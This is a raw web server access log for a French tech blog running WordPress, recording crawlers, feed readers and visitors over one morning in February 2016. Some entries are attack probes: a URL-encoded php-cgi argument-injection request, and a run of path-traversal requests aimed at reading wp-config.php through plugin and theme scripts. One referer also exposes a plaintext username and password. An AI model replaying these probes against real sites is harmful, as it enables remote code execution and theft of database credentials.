[08/Feb/2016:03:11:42 -0800] \"GET /feed/ HTTP/1.1\" 304 182 \"-\" \"NewsBlur Feed Fetcher - 4 subscribers - http://www.newsblur.com/site/5487666/techmeup-techmeup (Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3)\"\n180.76.15.144 - - [08/Feb/2016:03:19:23 -0800] \"GET / HTTP/1.1\" 200 33366 \"-\" \"Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)\"\n46.118.116.135 - - [08/Feb/2016:03:20:11 -0800] \"GET /steeve-morin-de-google-a-lentreprenariat/ HTTP/1.1\" 200 29314 \"http://owohho.com/\" \"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0\"\n192.99.150.96 - - [08/Feb/2016:03:34:40 -0800] \"GET /feed/ HTTP/1.1\" 200 63952 \"-\" \"Filterly3-Argotic-Syndication-Framework/2008.0.2.0\"\n198.58.102.95 - - [08/Feb/2016:03:42:45 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n188.165.224.104 - - [08/Feb/2016:03:47:44 -0800] \"GET /?author=2 HTTP/1.0\" 200 31297 \"-\" \"-\"\n198.58.103.115 - - [08/Feb/2016:03:50:46 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n54.158.4.90 - - [08/Feb/2016:04:03:14 -0800] \"GET /category/how-to/feed/ HTTP/1.1\" 200 25451 \"-\" \"Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)\"\n86.195.218.224 - - [08/Feb/2016:04:05:16 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 415 \"http://techmeup.co/rencontre-avec-nicolas-dessaigne-ceo-dalgolia/\" \"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n86.195.218.224 - - [08/Feb/2016:04:05:16 -0800] \"GET /wp-content/themes/great/js/modernizr.min.js HTTP/1.1\" 200 6229 \"http://techmeup.co/rencontre-avec-nicolas-dessaigne-ceo-dalgolia/\" \"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n86.195.218.224 - - [08/Feb/2016:04:05:16 -0800] \"GET /wp-content/plugins/wp-shortcode/js/jquery.tipsy.js?ver=4.1.1 HTTP/1.1\" 200 3065 \"http://techmeup.co/rencontre-avec-nicolas-dessaigne-ceo-dalgolia/\" \"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n86.195.218.224 - - [08/Feb/2016:04:05:16 -0800] \"GET /wp-includes/js/jquery/jquery.js?ver=1.11.1 HTTP/1.1\" 200 33586 \"http://techmeup.co/rencontre-avec-nicolas-dessaigne-ceo-dalgolia/\" \"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n86.195.218.224 - - [08/Feb/2016:04:05:17 -0800] \"GET /wp-content/themes/great/images/facebook.png HTTP/1.1\" 200 4285 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n86.195.218.224 - - [08/Feb/2016:04:05:17 -0800] \"GET /wp-content/themes/great/images/arrow.png HTTP/1.1\" 200 437 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n198.58.102.158 - - [08/Feb/2016:04:06:56 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n92.151.86.197 - - [08/Feb/2016:04:14:02 -0800] \"GET /florent-crivello-ingenieur-ios-a-kwarter/ HTTP/1.1\" 200 8644 \"-\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36\"\n92.151.86.197 - - [08/Feb/2016:04:14:03 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2049 \"http://techmeup.co/florent-crivello-ingenieur-ios-a-kwarter/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36\"\n92.151.86.197 - - [08/Feb/2016:04:14:03 -0800] \"GET /wp-content/themes/great/js/customscript.js HTTP/1.1\" 200 3600 \"http://techmeup.co/florent-crivello-ingenieur-ios-a-kwarter/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36\"\n92.151.86.197 - - [08/Feb/2016:04:14:03 -0800] \"GET /wp-content/plugins/wp-shortcode/js/wp-shortcode.js?ver=4.1.1 HTTP/1.1\" 200 831 \"http://techmeup.co/florent-crivello-ingenieur-ios-a-kwarter/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36\"\n92.151.86.197 - - [08/Feb/2016:04:14:04 -0800] \"GET /wp-content/uploads/2014/08/tumblr_inline_nb0xb4FLj01sygmpd-50x50.jpg HTTP/1.1\" 200 2535 \"http://techmeup.co/florent-crivello-ingenieur-ios-a-kwarter/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36\"\n92.151.86.197 - - [08/Feb/2016:04:14:08 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/florent-crivello-ingenieur-ios-a-kwarter/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36\"\n92.151.86.197 - - [08/Feb/2016:04:14:34 -0800] \"GET /wordpress/wp-content/uploads/2015/02/favico.png HTTP/1.1\" 200 987 \"-\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36\"\n79.143.142.234 - - [08/Feb/2016:04:24:34 -0800] \"GET /wp-content/uploads/2015/02/1620528_10152406520622652_278602715_n-300x300.jpg HTTP/1.1\" 200 37378 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n79.143.142.234 - - [08/Feb/2016:04:24:35 -0800] \"GET /wp-content/uploads/2015/03/1-9mRgHn-sBX_FQuA08m4kdA-1024x755.jpeg HTTP/1.1\" 200 97501 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n199.16.156.126 - - [08/Feb/2016:04:27:21 -0800] \"GET /robots.txt HTTP/1.1\" 200 367 \"-\" \"Twitterbot/1.0\"\n159.180.230.34 - - [08/Feb/2016:04:33:33 -0800] \"GET /adrien-duermael-pixowl-et-lindustrie/ HTTP/1.1\" 200 9305 \"https://www.google.fr\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0\"\n159.180.230.34 - - [08/Feb/2016:04:33:33 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 415 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0\"\n159.180.230.34 - - [08/Feb/2016:04:33:33 -0800] \"GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1\" 200 3421 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0\"\n159.180.230.34 - - [08/Feb/2016:04:33:33 -0800] \"GET /wp-includes/js/comment-reply.min.js?ver=4.1.1 HTTP/1.1\" 200 758 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0\"\n159.180.230.34 - - [08/Feb/2016:04:33:33 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/count.js?ver=4.1.1 HTTP/1.1\" 200 776 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0\"\n159.180.230.34 - - [08/Feb/2016:04:33:34 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0\"\n159.180.230.34 - - [08/Feb/2016:04:33:34 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 503 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0\"\n2.1.72.179 - - [08/Feb/2016:04:36:14 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n78.233.138.2 - - [08/Feb/2016:04:37:36 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://techmeup.co/ce-que-je-referais-autrement-invitee-mathilde-le-rouzic/\" \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n78.233.138.2 - - [08/Feb/2016:04:37:36 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/ce-que-je-referais-autrement-invitee-mathilde-le-rouzic/\" \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n78.233.138.2 - - [08/Feb/2016:04:37:36 -0800] \"GET /wp-content/plugins/wp-shortcode/js/wp-shortcode.js?ver=4.1.1 HTTP/1.1\" 200 831 \"http://techmeup.co/ce-que-je-referais-autrement-invitee-mathilde-le-rouzic/\" \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n78.233.138.2 - - [08/Feb/2016:04:37:36 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/lib/js/widget-easy-twitter-feed-widget.js?ver=1.0 HTTP/1.1\" 200 663 \"http://techmeup.co/ce-que-je-referais-autrement-invitee-mathilde-le-rouzic/\" \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n78.233.138.2 - - [08/Feb/2016:04:37:37 -0800] \"GET /wp-content/uploads/2014/08/tumblr_inline_naj6huWLqb1sa6hof-50x50.jpg HTTP/1.1\" 200 2457 \"http://techmeup.co/ce-que-je-referais-autrement-invitee-mathilde-le-rouzic/\" \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n78.233.138.2 - - [08/Feb/2016:04:37:37 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n78.233.138.2 - - [08/Feb/2016:04:38:03 -0800] \"GET /wordpress/wp-content/uploads/2015/02/favico.png HTTP/1.1\" 200 987 \"http://techmeup.co/ce-que-je-referais-autrement-invitee-mathilde-le-rouzic/\" \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n68.180.228.42 - - [08/Feb/2016:04:42:56 -0800] \"GET /marketing-pour-developpeurs-partie-2 HTTP/1.1\" 301 377 \"-\" \"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)\"\n77.34.17.95 - - [08/Feb/2016:04:56:07 -0800] \"GET /favicon.ico HTTP/1.1\" 200 239 \"-\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 YaBrowser/15.12.1.6475 Safari/537.36\"\n80.13.10.184 - - [08/Feb/2016:04:56:33 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n80.13.10.184 - - [08/Feb/2016:04:56:52 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/601.4.4 (KHTML, like Gecko)\"\n176.189.254.114 - - [08/Feb/2016:04:59:43 -0800] \"GET /arnaud-barbier-un-bidouilleur-haute-voltige-au/ HTTP/1.1\" 200 8898 \"https://www.google.fr\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:44.0) Gecko/20100101 Firefox/44.0\"\n176.189.254.114 - - [08/Feb/2016:04:59:45 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/arnaud-barbier-un-bidouilleur-haute-voltige-au/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:44.0) Gecko/20100101 Firefox/44.0\"\n176.189.254.114 - - [08/Feb/2016:04:59:45 -0800] \"GET /wp-includes/js/jquery/jquery.js?ver=1.11.1 HTTP/1.1\" 200 33586 \"http://techmeup.co/arnaud-barbier-un-bidouilleur-haute-voltige-au/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:44.0) Gecko/20100101 Firefox/44.0\"\n176.189.254.114 - - [08/Feb/2016:04:59:45 -0800] \"GET /wp-includes/js/comment-reply.min.js?ver=4.1.1 HTTP/1.1\" 200 757 \"http://techmeup.co/arnaud-barbier-un-bidouilleur-haute-voltige-au/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:44.0) Gecko/20100101 Firefox/44.0\"\n176.189.254.114 - - [08/Feb/2016:04:59:46 -0800] \"GET /wp-content/uploads/2015/03/UX-Basics-Workshop-50x50.jpg HTTP/1.1\" 200 2253 \"http://techmeup.co/arnaud-barbier-un-bidouilleur-haute-voltige-au/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:44.0) Gecko/20100101 Firefox/44.0\"\n176.189.254.114 - - [08/Feb/2016:04:59:46 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4482 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:44.0) Gecko/20100101 Firefox/44.0\"\n176.189.254.114 - - [08/Feb/2016:04:59:47 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 503 \"http://techmeup.co/arnaud-barbier-un-bidouilleur-haute-voltige-au/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:44.0) Gecko/20100101 Firefox/44.0\"\n203.162.15.233 - - [08/Feb/2016:05:03:20 -0800] \"POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1\" 404 15457 \"-\" \"Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25\"\n109.26.209.86 - - [08/Feb/2016:05:05:12 -0800] \"GET /wp-content/themes/great/js/modernizr.min.js HTTP/1.1\" 304 211 \"http://techmeup.co/paul-duan-le-super-heros-de-la-data-science-pour/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0\"\n109.26.209.86 - - [08/Feb/2016:05:05:12 -0800] \"GET /wp-content/plugins/wp-shortcode/js/jquery.tipsy.js?ver=4.1.1 HTTP/1.1\" 304 211 \"http://techmeup.co/paul-duan-le-super-heros-de-la-data-science-pour/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0\"\n109.26.209.86 - - [08/Feb/2016:05:05:12 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 304 187 \"http://techmeup.co/paul-duan-le-super-heros-de-la-data-science-pour/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0\"\n109.26.209.86 - - [08/Feb/2016:05:05:13 -0800] \"GET /wp-content/themes/great/js/customscript.js HTTP/1.1\" 304 212 \"http://techmeup.co/paul-duan-le-super-heros-de-la-data-science-pour/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0\"\n109.26.209.86 - - [08/Feb/2016:05:05:13 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 304 188 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0\"\n109.26.209.86 - - [08/Feb/2016:05:05:15 -0800] \"GET /welcome-phil-jeudy/ HTTP/1.1\" 200 7850 \"http://techmeup.co/paul-duan-le-super-heros-de-la-data-science-pour/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0\"\n109.26.209.86 - - [08/Feb/2016:05:05:17 -0800] \"GET /wp-content/uploads/2014/05/tumblr_inline_n59mnuUm3H1sygmpd-50x50.jpg HTTP/1.1\" 200 2463 \"http://techmeup.co/paul-duan-le-super-heros-de-la-data-science-pour/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0\"\n109.26.209.86 - - [08/Feb/2016:05:05:19 -0800] \"GET /welcome-phil-jeudy/ HTTP/1.1\" 200 7902 \"http://techmeup.co/paul-duan-le-super-heros-de-la-data-science-pour/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0\"\n62.210.142.23 - jez [08/Feb/2016:05:06:19 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://jez:lumn0h3D@techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n198.58.96.215 - - [08/Feb/2016:05:14:59 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n109.70.18.196 - - [08/Feb/2016:05:15:43 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n109.70.18.196 - - [08/Feb/2016:05:15:43 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2050 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n109.70.18.196 - - [08/Feb/2016:05:15:43 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/count.js?ver=4.1.1 HTTP/1.1\" 200 776 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n109.70.18.196 - - [08/Feb/2016:05:15:43 -0800] \"GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1\" 200 3421 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n109.70.18.196 - - [08/Feb/2016:05:15:43 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n109.70.18.196 - - [08/Feb/2016:05:15:43 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 592 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n193.201.227.130 - - [08/Feb/2016:05:19:28 -0800] \"GET /wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php HTTP/1.1\" 200 448 \"http://techmeup.co/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6 Chrome 19.0.1084.9\"\n193.201.227.130 - - [08/Feb/2016:05:19:30 -0800] \"GET /wp-content/themes/echelon/lib/scripts/dl-skin.php HTTP/1.1\" 404 4868 \"http://techmeup.co/wp-content/themes/awake/lib/scripts/dl-skin.php\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6 Chrome 19.0.1084.9\"\n193.201.227.130 - - [08/Feb/2016:05:19:33 -0800] \"GET /wp-content/plugins/db-backup/download.php?file=../../../wp-config.php HTTP/1.1\" 404 4868 \"http://techmeup.co/wp-content/themes/elegance/lib/scripts/dl-skin.php\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6 Chrome 19.0.1084.9\"\n193.201.227.130 - - [08/Feb/2016:05:19:36 -0800] \"GET /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download HTTP/1.1\" 301 552 \"http://techmeup.co/wp-content/themes/method/lib/scripts/dl-skin.php\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6 Chrome 19.0.1084.9\"\n193.201.227.130 - - [08/Feb/2016:05:19:38 -0800] \"GET /wp-content/themes/myriad/lib/scripts/dl-skin.php HTTP/1.1\" 404 4868 \"http://techmeup.co/wp-content/themes/modular/lib/scripts/dl-skin.php\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6 Chrome 19.0.1084.9\"\n193.201.227.130 - - [08/Feb/2016:05:19:45 -0800] \"GET /wp-content/themes/lote27/download.php?download=../../../wp-config.php HTTP/1.1\" 404 4868 \"http://techmeup.co/wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6 Chrome 19.0.1084.9\"\n193.201.227.130 - - [08/Feb/2016:05:19:49 -0800] \"GET /wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php HTTP/1.1\" 404 4868 \"http://techmeup.co/wp-content/themes/fusion/lib/scripts/dl-skin.php\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6 Chrome 19.0.1084.9\"\n193.201.227.130 - - [08/Feb/2016:05:19:52 -0800] \"GET /wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../wp-config.php HTTP/1.1\" 404 4868 \"http://techmeup.co/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6 Chrome 19.0.1084.9\"\n193.201.227.130 - - [08/Feb/2016:05:19:58 -0800] \"GET /wp-content/themes/infocus2/lib/scripts/dl-skin.php HTTP/1.1\" 404 4868 \"http://techmeup.co/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6 Chrome 19.0.1084.9\"\n193.201.227.130 - - [08/Feb/2016:05:20:00 -0800] \"GET /wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1\" 404 4868 \"http://techmeup.co/wp-content/themes/epic/includes/download.php?file=../../../../wp-config.php\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6 Chrome 19.0.1084.9\"\n193.201.227.130 - - [08/Feb/2016:05:20:01 -0800] \"GET /wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=../../../../wp-config.php HTTP/1.1\" 404 4868 \"http://techmeup.co/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.php\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6 Chrome 19.0.1084.9\"\n162.243.175.75 - - [08/Feb/2016:05:23:06 -0800] \"GET /feed/ HTTP/1.1\" 304 182 \"-\" \"NewsBlur Feed Fetcher - 4 subscribers - http://www.newsblur.com/site/5487666/techmeup-techmeup (Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3)\"\n193.5.240.1 - - [08/Feb/2016:05:25:34 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2049 \"http://techmeup.co/michael-ferranti-responsable-marketing-a-mailgun/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9\"\n193.5.240.1 - - [08/Feb/2016:05:25:34 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/easy-twitter-feed-widget.css?ver=4.1.1 HTTP/1.1\" 200 505 \"http://techmeup.co/michael-ferranti-responsable-marketing-a-mailgun/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9\"\n193.5.240.1 - - [08/Feb/2016:05:25:34 -0800] \"GET /wp-includes/js/comment-reply.min.js?ver=4.1.1 HTTP/1.1\" 200 757 \"http://techmeup.co/michael-ferranti-responsable-marketing-a-mailgun/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9\"\n193.5.240.1 - - [08/Feb/2016:05:25:34 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/lib/js/widget-easy-twitter-feed-widget.js?ver=1.0 HTTP/1.1\" 200 663 \"http://techmeup.co/michael-ferranti-responsable-marketing-a-mailgun/\" \"Mozilla/5.0 